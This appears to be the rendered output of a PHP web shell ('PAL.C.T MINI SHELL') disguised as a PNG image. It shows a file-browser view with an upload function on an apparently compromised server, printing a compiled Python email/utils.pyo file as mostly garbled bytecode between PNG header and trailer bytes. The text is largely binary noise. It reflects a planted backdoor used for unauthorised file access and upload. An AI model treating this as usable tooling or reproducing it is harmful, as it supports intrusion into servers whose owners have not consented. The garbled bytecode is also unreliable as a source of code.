php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /proc/self/root/usr/lib/python2.6/email/
upload
files >> //proc/self/root/usr/lib/python2.6/email/utils.pyo

Lc@sdZddddddddd	d
ddd
g
ZddkZddkZddkZddkZddkZddkZddkZddk	Z	ddk
lZddk
lZ
ddk
lZddk
lZddk
lZddklZddklZlZdZdZdZdZdZeidZeidZ dZ!dZ"d Z#d!Z$d"Z%eid#ei&ei'BZ(de*e*d$Z+dd%Z,d&Zd'Zd(Z-d)Z.d*Z/ddd+Z0eid,Z1d-Z2d.d/d0Z3dS(1sMiscellaneous utilities.tcollapse_rfc2231_valuet
decode_paramstdecode_rfc2231tencode_rfc2231t
formataddrt
formatdatetgetaddressest
make_msgidt	mktime_tzt	parseaddrt	parsedatetparsedate_tztunquoteiN(tquote(tAddressList(R(R
(R(tdecodestring(t_bencodet_qencodes, tus
t's[][\\()<>@,:;".]s	[][\\()"]cCs|S(N((ts((s!/usr/lib/python2.6/email/utils.pyt	_identity:scCsI|p|Sti|}|ido|ido	|d S|S(Ns
i(tbase64Rtendswith(Rtvalue((s!/usr/lib/python2.6/email/utils.pyt_bdecode>s!	cCs.tidt|}tidt|}|S(s+Replace all line-ending characters with 
.s	(?<!\r)\ns\r(?!\n)(tretsubtCRLF(R((s!/usr/lib/python2.6/email/utils.pytfix_eolsJscCs^|\}}|oGd}ti|o
d}ntid|}d||||fS|S(sThe inverse of parseaddr(), this takes a 2-tuple of the form
    (realname, email_address) and returns the string value suitable
    for an RFC 2822 From, To or Cc header.

    If the first element of pair is false, then the second element is
    returned unmodified.
    Rt"s\\\g<0>s%s%s%s <%s>(t
specialsretsearcht	escapesreR(tpairtnametaddresstquotes((s!/usr/lib/python2.6/email/utils.pyRTs
cCs"ti|}t|}|iS(s7Return a list of (REALNAME, EMAIL) for each fieldvalue.(t
COMMASPACEtjoint_AddressListtaddresslist(tfieldvaluestallta((s!/usr/lib/python2.6/email/utils.pyRgss_
  =\?                   # literal =?
  (?P<charset>[^?]*?)   # non-greedy up to the next ? is the charset
  \?                    # literal ?
  (?P<encoding>[qb])    # either a "q" or a "b", case insensitive
  \?                    # literal ?
  (?P<atom>.*?)         # non-greedy up to the next ?= is the atom
  \?=                   # literal ?=
  c	CsX|d$joti}n|oti|}tio|do
ti}n
ti}tt|d\}}|djo
d}nd}d|||df}n'ti|}|o
d}nd	}d
ddd
ddddg|d|dddddddddddddg|d d |d|d!|d"|d#|fS(%sReturns a date string as specified by RFC 2822, e.g.:

    Fri, 09 Nov 2001 01:08:47 -0000

    Optional timeval if given is a floating point time value as accepted by
    gmtime() and localtime(), otherwise the current time is used.

    Optional localtime is a flag that when True, interprets timeval, and
    returns a date relative to the local timezone instead of UTC, properly
    taking daylight savings time into account.

    Optional argument usegmt means that the timezone is written out as
    an ascii string, not numeric one (so "GMT" instead of "+0000"). This
    is needed for HTTP, and is only used when localtime==False.
    iiit-t+s
%s%02d%02di<tGMTs-0000s"%s, %02d %s %04d %02d:%02d:%02d %stMontTuetWedtThutFritSattSuniitJantFebtMartAprtMaytJuntJultAugtSeptOcttNovtDeciiiiN(	tNonettimet	localtimetdaylighttaltzonettimezonetdivmodtabstgmtime(	ttimevalREtusegmttnowtoffsetthourstminutestsigntzone((s!/usr/lib/python2.6/email/utils.pyR{s.

	


 !cCsti}tidti|}ti}tid}|djo
d}nd|}ti	}d|||||f}|S(sReturns a string suitable for RFC 2822 compliant Message-ID, e.g:

    <20020201195627.33539.96671@nightshade.la.mastaler.com>

    Optional idstring if given is a string used to strengthen the
    uniqueness of the message id.
    s%Y%m%d%H%M%SiRt.s<%s.%s.%s%s@%s>N(
RDtstrftimeRKtostgetpidtrandomt	randrangeRCtsockettgetfqdn(tidstringRLtutcdatetpidtrandinttidhosttmsgid((s!/usr/lib/python2.6/email/utils.pyRs


cCs|pdSt|S(N(RCt
_parsedate(tdata((s!/usr/lib/python2.6/email/utils.pyR
scCs|pdSt|S(N(RCt
_parsedate_tz(Rc((s!/usr/lib/python2.6/email/utils.pyRscCs#t|i}|pdS|dS(NRi(RR(R(R)(taddrtaddrs((s!/usr/lib/python2.6/email/utils.pyR	scCst|djot|ido4|ido$|dd!iddiddS|ido|ido|dd!Sn|S(	sRemove quotes from a string.iRis\\s\s\"t<t>(tlent
startswithRtreplace(tstr((s!/usr/lib/python2.6/email/utils.pyRs $ cCs7|itd}t|djodd|fS|S(s#Decode string according to RFC 2231iN(tsplittTICKRiRC(Rtparts((s!/usr/lib/python2.6/email/utils.pyRscCshddk}|i|dd}|djo|djo|S|djo
d}nd|||fS(sEncode string according to RFC 2231.

    If neither charset nor language is given, then s is returned as-is.  If
    charset is given but not language, the string is encoded using the empty
    string for language.
    iNtsafeRs%s'%s'%s(turllibR
RC(RtcharsettlanguageRq((s!/usr/lib/python2.6/email/utils.pyRs

s&^(?P<name>\w+)\*((?P<num>[0-9]+)\*?)?$c

Cs|}g}h}|id\}}|i||fx|o|id\}}|ido
t}nt}t|}ti|}|o[|idd\}}|dj	ot
|}n|i|gi|||fq>|i|dt|fq>W|ox|i
D]\}}g}t}	|ixD|D]<\}}
}|oti|
}
t}	n|i|
qVWtti|}|	o9t|\}}}|i|||d|ffq-|i|d|fq-Wn|S(sDecode parameters list according to RFC 2231.

    params is a sequence of 2-tuples containing (param name, string value).
    it*R#tnums"%s"N(tpoptappendRtTruetFalseRtrfc2231_continuationtmatchtgroupRCtintt
setdefaultR
titemstsortRqtEMPTYSTRINGR'R(
tparamst
new_paramstrfc2231_paramsR#RtencodedtmoRut
continuationstextendedRRrRs((s!/usr/lib/python2.6/email/utils.pyRsJ

&"


$Rksus-asciicCszt|to\t|d}|dpd}yt|||SWqvtj
ot|||SXnt|SdS(Niisus-ascii(t
isinstancettupleRtunicodetLookupError(Rterrorstfallback_charsettrawvalRr((s!/usr/lib/python2.6/email/utils.pyR8s(4t__doc__t__all__RVRRDRRXRZRqtwarningstemail._parseaddrR
RR(RR
RbRRdtquopriRt_qdecodetemail.encodersRRR&RtUEMPTYSTRINGRRntcompileRR!RRRRRtVERBOSEt
IGNORECASEtecreRCRyRRR	RRRRzRR(((s!/usr/lib/python2.6/email/utils.pyt<module>sl				
		5						5
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`